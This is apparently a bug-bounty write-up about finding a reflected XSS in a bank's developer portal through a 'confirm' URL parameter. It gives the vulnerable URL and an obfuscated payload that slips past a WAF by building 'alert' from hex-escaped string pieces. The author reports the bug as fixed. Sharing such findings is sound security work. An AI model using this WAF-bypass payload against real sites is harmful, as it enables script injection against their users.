Bypass WAF 500 Unauthorized Access! to Reflected XSS (Cross Site Scripting)- Developer BCA
Hello, here I just want to share my experience regarding finding the XSS (Cross site scripting) bug at one of the banks in Indonesia, namely BCA (Bank Central Asia).
Little Story
I previously got this URL from 17 May 2019 and it comes from an email from Bank BCA, namely “Developer BCA”
And this is where I get the parameters that are vulnerable to this XSS attack.
Parameter = /registration/confirmemail.php?confirm=0
Steps to Reproduce
- Opening the website page https://developer.bca.co.id/registration/confirmemail.php?confirm=XSS
2. Then I try to add Single Quote (‘) and HTML Tags like (<and>) I get it not encoded at all.
3.When I want to try to pop up a simple alert like test Function`alert () ``` and the website will immediately experience an error that may be from the WAF and have the message “Unauthorized Access!”
Here I feel quite proud because a few days earlier I read Write Up from my Facebook, which in my opinion is the same case I am experiencing today!!!
4. Next I will show you related to the Write Up that I meant earlier
Full Payload : test ‘-Function`self[‘a’\x2b’l’\x2b’e’\x2b’r’\x2b’t’]\x281\x29```-’
This payload uses Unicode Hex :
test ‘-Function`self[‘a’\x2b’l’\x2b’e’\x2b’r’\x2b’t’]\x281\x29```-’
test ‘-Function`self[‘a’+’l’+’e’+’r’+’t’](1)```-’
Aaannnddddddd …. It worked !!!
Bad Ending~
There was no response from Team BCA but the bug has now been fixed :(
Reference
I hope you enjoyed this writeup!!! SSSSKKKKKRRRRTTTT!!!!